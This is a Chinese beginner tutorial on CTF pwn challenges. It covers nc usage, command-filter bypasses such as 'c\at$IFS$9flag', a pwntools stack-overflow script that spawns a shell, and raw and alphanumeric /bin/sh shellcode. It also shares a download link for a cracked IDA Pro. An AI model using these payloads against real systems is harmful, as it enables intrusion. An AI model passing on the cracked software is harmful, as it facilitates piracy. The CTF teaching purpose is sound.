CTF-PWN学习-为缺少指导的同学而生

这篇具有很好参考价值的文章主要介绍了CTF-PWN学习-为缺少指导的同学而生。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

  更新公告:

        2023-7-5晚上21:12 已更新,对内容做了些调整。

调整如下:

        添加解题步骤描述

        添加专业名词描述

        博主也是个PWN的入门者。PWN的入门不可能是无痛的。能做到的只是减少一点初学者的痛苦。这篇博客会长期维护,也会越来越好。

PWN是什么

        CTF中PWN题型通常会直接给定一个已经编译好的二进制程序,然后参赛选手通过对二进制程序进行逆向分析和调试来找到利用漏洞,并编写利用代码发送playload,通过远程代码执行来达到攻击的效果,最终拿到目标机器的shell(控制台权限)来夺取flag。

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

专业名词

二进制程序:常为C、C++及python写的一段程序,程序中往往包含着这样那样的漏洞。

逆向分析:利用反汇编等途径查看源代码并对程序进行理解的过程

调试:程序调试是指通过分析和排查程序中的错误和问题,以找出程序运行过程中的错误和异常,并进行修复和优化的过程。调试是软件开发过程中非常重要的一环,可以帮助开发人员快速定位和解决程序中的问题,提高程序的质量和稳定性。

playload:payload是指用于利用程序漏洞的输入数据或代码。通过构造恶意的payload,攻击者可以利用程序中的漏洞来执行任意的代码或获取系统权限。

shell:"shell"通常指的是一个交互式的命令行界面,可以用于执行系统命令和操作。可以说,拿到了shell,你就是服务器的拥有者。自然而然就可以光明正大的查找这台服务器上的flag

解题步骤

  1. 获取题目附件

  2. 将附件复制一份到Linux虚拟机中,使用checksec指令检查程序开启的保护和程序的位数(32位或64位)

  3. 打开题目环境,使用nc指令连接服务器,尝试猜测程序的功能,有时签到题会在你nc上去后,直接提供给你系统权限,此时可直接使用系统指令,寻找flag

  4. 使用对应位数的IDA工具对附件进行反编译,理解并发现其中的漏洞

  5. 分析漏洞,使用python和pwntool库编写攻击脚本playload。

  6. 最后,让你的攻击脚本跑起来,成功拿取权限后,flag即可到手

本博客在B站有配套视频,随博客同步跟新,但博客内容的替换和更新会更加频繁。等博主社恐的毛病处理好,视频会重新录制,现在可能有些糟糕。还望大家见谅

Rotten战队的个人空间-Rotten战队个人主页-哔哩哔哩视频

目录

一、教学用的题库网址

二、刷题加学习

实验1---nc的使用与系统命令执行

B站配套视频

1.test_your_nc    ----nc的使用与系统命令执行1

2.[SWPUCTF 2021 新生赛]nc    ----nc的使用与系统命令执行2

练习题(想起来我就会添加上来,会不断更新,内容不会超出已学习内容)

实验二-权限提升

B站配套视频

1、[NISACTF 2022]ReorPwn?    --system(cmd) 

2、 简单点的题找不到了,后面补上   --system("bin/sh")

练习题

实验三、向数组填充数据并简单写一个攻击脚本

B站配套视频

实验四-栈溢出基础题型

B站配套视频链接

rip---极简栈溢出

实验5-栈溢出简单利用2-system函数传参数

B站视频链接

视频内容题目

实验6-shellcode和ret2shell 

B站视频链接

视频内容题目

 三、PWN必备的那些工具总表


一、教学用的题库网址

 我会以NSSCTF,BUUCTF平台的题目做教学,后面也会加其他平台。

NSSCTF网址   https://www.ctfer.vip/indexhttps://www.ctfer.vip/index

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 注册教程,这个网站有提示,照着走呗。

BUUCTF

BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges

二、刷题加学习

实验1---nc的使用与系统命令执行

实验准备-请在实验前完成下载

Linux虚拟机,我觉得CTF选手应该都有吧。没有的话建议装Kali。界面很帅,内置工具多,专业攻击机。CentOS,Unbuant也行,其实没那么高要求。安装教程?先百度去吧,后面有可能我自己补一篇。^----^

以下提供2种虚拟机软件选择

 VirtualBox

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

VMware

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

以下提供3种linux系统选择

kali官网

Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution

乌班图官网

Ubuntu系统下载 | Ubuntu

CentOS官网

 Download

正式开始

B站配套视频

PWN入门-nc指令使用与PWN基础linux简单指令_哔哩哔哩_bilibili

1.test_your_nc    ----nc的使用与系统命令执行1

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 BUUCTF平台--test_your_nc

不要跳着看,接下来细节满满开始啦。

可以在搜索栏,搜索题目名称,开启环境。

学习目标:

  1. 学会nc指令的使用
  2. 学会使用拿到系统控制权后的指令执行
  3. kali控制台使用

解题流程(我会很细心的写,不像他们大多数的wtrite up,只能做出来,但很难懂):

开启环境

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

  是不是看到node4.buuoj.cn:27399啦,这个就是你的服务器地址,啥?你个大聪明想用浏览器打开,想啥呢?协议不对啊,这不是HTTP。

基本上题目服务器地址就是以下2种形式  

域名:端口号       如本题
IP地址:端口号     如192.168.32.12:10001

 打开虚拟机,使用nc连接服务器

  开机

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

桌面右键点击在这里打开终端 

 pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 大黑框出现了,但至少比Windows那个好看,这个可是半透明的呀,朦胧的美感,啧啧。 

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 写指令

指令形式
nc ip 端口号
nc 域名 端口号

本题
nc node4.buuoj.cn 27399

连上去发现光标不动了

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

尝试输入指令ls(linux系统中显示当前文件下文件名的指令) ,红色为你输入的指令,绿色是执行后显示的当前目录下的文件名。看到flag了吧。是不是很想打开

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 使用cat指令可以读取Linux上的文件

cat 文件名

本题:
cat flag

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 去吧,提交你的flag。

2.[SWPUCTF 2021 新生赛]nc    ----nc的使用与系统命令执行2

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

学习目标:

  1. 学会nc指令的使用
  2. 学会使用拿到系统控制权后的指令执行
  3. 学一点点过滤绕过(大部分题不会有要求绕过过滤)

开启环境

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 打开虚拟机,使用nc连接服务器

 写指令

指令形式
nc ip 端口号
nc 域名 端口号


本题
nc node1.anna.nssctf.cn 28456

弹出乱七八糟的玩意。 

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 看不懂,去把附件下载下来

里面是python代码,分析一下

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 权限直接给我们了,但看程序逻辑,当用户输入列表blacklist中字符串时,自动结束程序。

此时如果输入ls(Linux系统中查看当前目录下文件的指令),就会退出。所以需要绕过这个过滤。

使用l\s,执行时l\s=ls,但在字符串判断时肯定不是相同的。pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 如图,我输入了l\s,列出了当前目录下的文件,那么大个flag看到没有,那接下来就要访问它。

我们使用cat指令,读取文件(回头看一下,cat也被过滤了,没事,再加条\,变成c\at flag)

cat 文件名
cat flag

此题存在过滤
要绕过处理

c\at$IFS$9flag

$IFS$9可以替换空格

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 出来了。

练习题(想起来我就会添加上来,会不断更新,内容不会超出已学习内容)

平台+2:Bugku和ctfshow

首页 - Bugku CTF国内最活跃的CTF平台,每日更新题目。https://ctf.bugku.com/ctf.showhttps://ctf.show/

1.Bugku --瑞士军刀    

 pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

2.ctfshow-PWN签到题

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

3.NSSCTF-Does your nc work?

4.BUUCTF-others_shellcode 

实验二-权限提升

实验前准备

  1.   IDA7.7pro

学习目标:

  1. 了解权限提升
  2. IDA简单使用

所谓权限提升就是获取服务器系统权限,执行指令。最常见的就是system()。

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 PWN的过程,用户机发起nc链接,与控制访问程序交互,利用漏洞让控制访问程序执行system(),从而运行我们输入的系统指令。

B站配套视频

PWN入门2-PWN过程与权限提升_哔哩哔哩_bilibili

1、[NISACTF 2022]ReorPwn?    --system(cmd) 

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

下载附件,将附件赋值一份到linux中,执行checksec指令,可以查看这个控制程序的信息。 

 pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 第一行显示了64位,所以我们可以用IDApro7.7的64位版本打开

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 直接点击OK

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 这个页面按下F5,反汇编为伪代码pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 看到关键函数system()pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 点进去看一下,是不是我们要的那种。双击那个system(a)

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 好极了,就是这个。再来看一下变量command是如何传进去的,左上角箭头,回到历史记录

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 再分析一下程序,用户的输入被存到了变量a中,a经过fun函数后,传入system函数执行,也就是说,command就是a,也就是用户的输入。

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 再双击fun看一下,有没有特殊处理

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

经典的字符串倒置代码,也就是说,它会把你的输入倒过来,即ls->sl ,cat flag->galf tac

所以我们输入指令要倒着输入.

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

2、 简单点的题找不到了,后面补上   --system("bin/sh")

其实和system(cmd)那种没太大区别,就是这个会拉起控制台执行命令。效果其实一样

练习题

。。。待补充

实验三、向数组填充数据并简单写一个攻击脚本

内容视频,文章偷懒不写。嘻嘻嘻 

B站配套视频

PWN入门3-填充数据和写一个简单攻击脚本_哔哩哔哩_bilibili

实验四-栈溢出基础题型

啥?找不到资源。我分享行了吧

IDA pro7.7

链接:https://pan.baidu.com/s/11YzTTBgDzlrg8a_k-raqqw?pwd=6666 
提取码:6666 

解压后

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN 执行,选择yes即可完成破解

 python安装pwn教程,推荐去看B站星盟安全PWN入门第一集环境安装。不是引流啊,我是确实觉得还可以,小哥哥声音很好听的,对于我这种声控来说简直爱了爱了。

【星盟安全】PWN全集,从入门到精通,最通俗易懂的CTF,持续更新中_哔哩哔哩_bilibili

实验前预习知识

请完成以下几个视频的观看(顺序)

3.1.1_栈的基本概念_哔哩哔哩_bilibili3.1.1_栈的基本概念是王道计算机考研 数据结构的第20集视频,该合集共计97集,视频收藏或关注UP主,及时了解更多相关视频内容。https://www.bilibili.com/video/BV1b7411N798?p=20&vd_source=b0baa38241452f542afabdf70d10fca7
【算法】数据结构中的栈有什么用?_哔哩哔哩_bilibili介绍数据结构中的栈stack,以及两个小例子。, 视频播放量 8831、弹幕量 8、点赞数 390、投硬币枚数 224、收藏人数 299、转发人数 104, 视频作者 从0开始数, 作者简介 ,相关视频:数据结构与算法(合集),什么是算法,算法与数据结构,栈的基础知识,已知入栈序列,求出栈元素,汉诺塔小游戏和递归思想,【喵的算法课】栈与队列 表达式计算【4期】,数据结构难点分析,学习建议,数据结构的使用-栈(Stack),学数据结构之前 必看,【散装数据结构】#01:栈,【数据结构】栈->入栈和出栈https://www.bilibili.com/video/BV1hp4y1x7u9/?spm_id_from=333.337.search-card.all.click&vd_source=b0baa38241452f542afabdf70d10fca7

还不懂栈的特点?让洛天依来亲自教给你!_哔哩哔哩_bilibili偶然听到洛天依的《小鸡哔哔》这首歌,然后一琢磨,这歌词唱的简直太符合栈的LIFO的特点了,拿来直观看看压栈和弹栈简直太合适了更有趣的是,最后直接一个拖拉机干堆栈溢出了(手动doge),结束了这个万恶的疯狂压栈过程。本人还是新手,刚接触Java和很基础的编程知识没几天,如果视频中有不合理的地方,也欢迎在评论区指出,但答应我,一定要和平讨论哦!视频制作不易(虽然没任何技术含量,但是调那个栈底和栈, 视频播放量 2034、弹幕量 4、点赞数 250、投硬币枚数 51、收藏人数 117、转发人数 22, 视频作者 Disy920, 作者简介 啥都很想干却什么也干不精的咸鱼一条,相关视频:偶然发现的一个编程神器!简直吹爆这款编程神器,页面干净,题目丰富,有视频教程,有常用的Java,Python,Web等各种语言的#C++#程序员#算法#AI,曾经被程序员嘲讽”狗“都不去的外包,2023年一把逆袭上位,现在外包公司形势如何?程序员还能去吗?,程序员认不认真写代码的区别,超简单的递归,别再被洗脑了!互联网的十年红利期已经到了,程序员的出路到底在哪里?,【Java最新面试题】数据结构面试题:谈一谈你对B树和B+树的理解?,【面试精选】字节大佬一周讲透LeetCode算法110题,直击大厂必问数据结构与算法面试题真题详解,想快速看你的入站时间?UP主自己写程序帮你实现愿望!,【百万好评】国外大佬竟把C++讲的如此通俗详细!整整300集,草履虫都能听懂!这么好的教程还没人看?我不更了!!!,上岸学姐劝诫,盲目学C++的后果真的很严重,能劝一个是一个https://www.bilibili.com/video/BV1j54y1N782/?spm_id_from=333.337.search-card.all.click&vd_source=b0baa38241452f542afabdf70d10fca7

一个玩玩数据结构的网站

Data Structure Visualization

学习目标 

  1. 了解数据结构栈
  2. 了解栈溢出
  3. 利用栈溢出提升权限
  4. pwntools初体验

B站配套视频链接

pwn入门4-简单栈溢出利用_哔哩哔哩_bilibili

rip---极简栈溢出

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 BUUCTF rip

学习目标:

  1. 简单使用IDApro7.7
  2. 理解栈溢出
  3. 了解危险函数gets()

第一步:nc链接,熟悉环境

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 他要是光标不动了,八成在等你输入,随便输点啥玩意

第二步:下载文件,使用checksec指令检查文件保护(控制台打开的位置要与文件在同一级下)

否则会报错找不到

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

指令

checksec 文件名
checksec pwn1

检查结果,第一行显示这个是64位程序,下面的以后会讲到

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 第三步:IDA打开文件

IDA是有32位和64位的,你安装时这两个是一起安装的。我们在上一步已经知道程序位数(位数错了将无法反编译看伪代码)

用IDA64.exe打开文件。大家可以学我将快捷方式放在文件附近,可以直接将文件拖动到图标上打开。

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

点击OK ,进入IDA,直接shift+F12进入字符串窗口

看到熟悉的字符串没?这就是熟悉环境的作用,利用这个可以快速找到主函数,方便我们分析代码

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 双击它

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 在此处,双击右侧发黄那个玩意,那里显示的是调用这个字符串的函数,

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 在这里F5,反编译代码,生成伪代码

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 gets()是个危险函数,它会一直读取用户的输入,造成栈溢出

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[15]; // [rsp+1h] [rbp-Fh] BYREF

  puts("please input");
  gets(s, argv);
  puts(s);
  puts("ok,bye!!!");
  return 0;
}

 第四步:找到提权函数,提升权限

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 字符串页面还有个/bin/sh字符串,这是系统命令执行函数的标准特征,顺腾摸瓜。记住下面这个东西,以后会经常见到。

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 找到这个函数的地址,push开始的位置,这是这个函数进入程序执行的象征

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

  第五步:编写解题脚本

1.如何在Linux中创建一个python脚本

vim 文件名.py

我写的
vim attack.py

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 回车执行

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 随便写点字符进去。按下ESC,再按下:,输入小写wq,桌面就会多出一个attack.py文件

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 右键mousepad打开

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 可以在这里书写代码pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 脚本内容

from pwn import *                 #调用pwntools库

p=remote('node4.buuoj.cn',25779)  #设置要链接的服务器,这一句就是为了链接服务器

flag = 0x0401186                  #bin/sh那个函数的地址,0x表示16进制

payload = b'a'*(15)+p64(flag)     #生成15个垃圾二进制数据,b'a'表示二进制的字母a。栈填满了之后,加上目标函数地址,就可以执行这个函数

p.sendline(payload)               #发送这个攻击载荷

p.interactive()                   #与控制台进行交互,之后就可以执行指令啦

第六步:跑代码

脚本位置附近打开控制台输入

python3 文件名.py

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

执行指令试试,OK 

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

 flag到手

课后练习

NSSCTF-warmup_csaw_2016-栈溢出+堆栈平衡

BUUCTF-jarvisoj_level0

NSSCTF-gift_pwn

NSSCTF-R3m4ke

NSSCTF-babystack

实验5-栈溢出简单利用2-system函数传参数

啊啊啊,太忙了,忘记了,先把视频贴上,后面慢慢补吧

B站视频链接

PWN入门5-栈溢出简单利用2-system函数传指令_哔哩哔哩_bilibili

视频内容题目

麻烦姥爷们打一下字,嘻嘻嘻

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN

实验6-shellcode和ret2shell 

啊啊啊,太忙了,忘记了,先把视频贴上,后面慢慢补吧

B站视频链接

PWN入门6-shellcode和ret2shellcode_哔哩哔哩_bilibili

视频内容题目

picoctf_2018_shellcode--shellcode

mrctf2020_shellcode_revenge--可见shellcode

[HNCTF 2022 Week1]safe_shellcode--可见shellcode

[GDOUCTF 2023]Shellcode--ret2shellcode

[SWPUCTF 2022 新生赛]shellcode? -- 保护+shellcraft

shellcode是一段用于利用软件漏洞执行攻击操作的代码,也可以认为是一段填充数据,但因为其经常让攻击者获得控制台权限shell故而称为shellcoed。

不可见版本

#32 位 短字节 shellcode -> 21 字节

#\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

#64 位 较短的 shellcode 23 字节

#\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

可见版本

x64 下的:

Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t 

x32 下的:

PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA 

pwntools生成

asm(shellcraft.sh()) 44位

使用alpha3编码shellcode

这个工具我没找到,以后看到加上来

 三、PWN必备的那些工具总表

这里主要是为了万一哪天电脑数据丢失了,可以给大家提供一下工具清单,便于大家恢复环境。

  1.  IDA7.7pro
  2.  python库pwn
  3. Linux虚拟机

啥?找不到资源。我分享行了吧

IDA pro7.7

链接:https://pan.baidu.com/s/11YzTTBgDzlrg8a_k-raqqw?pwd=6666 
提取码:6666 

解压后

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN 执行,选择yes即可完成破解

 python安装pwn教程,推荐去看B站星盟安全PWN入门第一集环境安装。不是引流啊,我是确实觉得还可以,小哥哥声音很好听的,对于我这种声控来说简直爱了爱了。

【星盟安全】PWN全集,从入门到精通,最通俗易懂的CTF,持续更新中_哔哩哔哩_bilibili

Linux虚拟机的话,我觉得CTF选手应该都有吧。没有的话建议装Kali。界面很帅,内置工具多,专业攻击机。CentOS,Unbuant也行,其实没那么高要求。安装教程?先百度去吧,后面有可能我自己补一篇。^----^

pwn教程,CTF,学习,网络安全,CTF比赛,CTF-PWN入门,PWN文章来源地址https://www.toymoban.com/news/detail-733438.html

到了这里,关于CTF-PWN学习-为缺少指导的同学而生的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • PWN学习之格式化字符串及CTF常见利用手法

    格式化字符串漏洞是一种常见的安全漏洞类型。它利用了程序中对格式化字符串的处理不当,导致可以读取和修改内存中的任意数据。 格式化字符串漏洞通常发生在使用 C 或类似语言编写的程序中,其中  printf 、 sprintf 、 fprintf  等函数用于将数据格式化为字符串并进行输出

    2024年02月19日
    浏览(41)
  • awd pwn——LIEF学习

    LIEF 是一个能够用于对各种类型的可执行文件(包括Linux ELF文件、Windows exe文件、Android Dex文件等)进行转换、提取、修改的项目,能够在Python、C++和C语言中调用其API进行简单便捷的可执行文件相关操作。 在AWD pwn中,我们常常需要对官方给出的ELF文件进行修补(称为Patch),

    2024年02月11日
    浏览(39)
  • Kernel Pwn基础教程之 Double Fetch

    Double Fetch是一种条件竞争类型的漏洞,其主要形成的原因是由于用户态与内核态之间的数据在进行交互时存在时间差,我们在先前的学习中有了解到内核在从用户态中获取数据时会使用函数copy_from_user,而如果要拷贝的数据过于复杂的话则内核会选择引用其指针而将数据暂存

    2024年02月08日
    浏览(42)
  • 二进制学习(pwn)-shellcode

    安装好了pwntool、ROPgadget、onegadget以及pwngdb,读懂并手写脚本复现了上一篇中基于64位有后门的栈溢出漏洞,恭喜你少年,你已经完成二进制的筑基啦。接下来,我们要介绍的是栈溢出的第二种利用形式:基于shellcode的栈溢出。 在编程语言中要想获得系统执行权限,可以使用s

    2024年02月08日
    浏览(40)
  • CTFshow-pwn入门-前置基础pwn32-pwn34

    FORTIFY_SOURCE(源码增强),这个其实有点类似与Windows中用新版Visual Studio进行开发的时候,当你用一些危险函数比如strcpy、sprintf、strcat,编译器会提示你用xx_s加强版函数。 FORTIFY_SOURCE本质上一种检查和替换机制,对GCC和glibc的一个安全补丁。 目前支持memcpy, memmove, memset, strcpy, s

    2024年02月09日
    浏览(34)
  • CTFshow-pwn入门-栈溢出pwn49(静态链接pwn-mprotect函数的应用)

    首先我们先将pwn文件下载下来,然后赋上可执行权限,再来查看pwn文件的保护信息。 我们可以看到这是一个32位的pwn文件,并且保护信息开启了NX和canary,也就是堆栈不可执行且有canary。最最最重要的是这个文件是statically linked!!!静态编译文件呀! 根据题目的提示,我们

    2024年02月13日
    浏览(39)
  • 攻防世界hello pwn WP(pwn入门基础题)

    题目网址: 攻防世界 下载文件,文件名太长了把文件改名为pwn 把pwn文件放入kali里面 file一下查看文件类型 发现是一个64位的elf文件,加个运行权限,运行一下看看  使用 checksec 检查保护 发现只开了 NX 保护。 把pwn放入64位IDA中,F5反汇编一下main函数 得到main函数伪代码 点击

    2024年02月10日
    浏览(45)
  • 从零开始配置pwn环境:sublime配置并解决pwn脚本报错问题

    Download - Sublime Text 用vscode鼠标右键调出命令平台  输入 convert indentation to Tabs,保存文件  完美解决,具体如下:

    2024年01月22日
    浏览(45)
  • PWN工具之pwndbg

    pwndbg是一个用于GDB的插件,旨在帮助进行漏洞利用和CTF挑战的动态调试工具。它提供了一系列的功能和命令,可以帮助我们更方便地进行动态调试。同时,pwndbg也是一个开源工具,可以在GitHub上找到并自由使用。 pwndbg插件可以通过GitHub下载和安装。首先,需要将插件克隆到本

    2024年02月07日
    浏览(35)
  • musl pwn 入门 (1)

    近年来,musl libc作为一个轻量级的libc越来越多地出现在CTF pwn题之中,其和glibc相比有一定的差距,因此本文我们就musl libc最常考的考点——内存分配,进行musl libc的源代码审计。 不同于glibc多达四五千行代码,大小超过10w字节的malloc.c,musl libc中的malloc.c大小甚至都不到1w字节

    2023年04月25日
    浏览(31)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包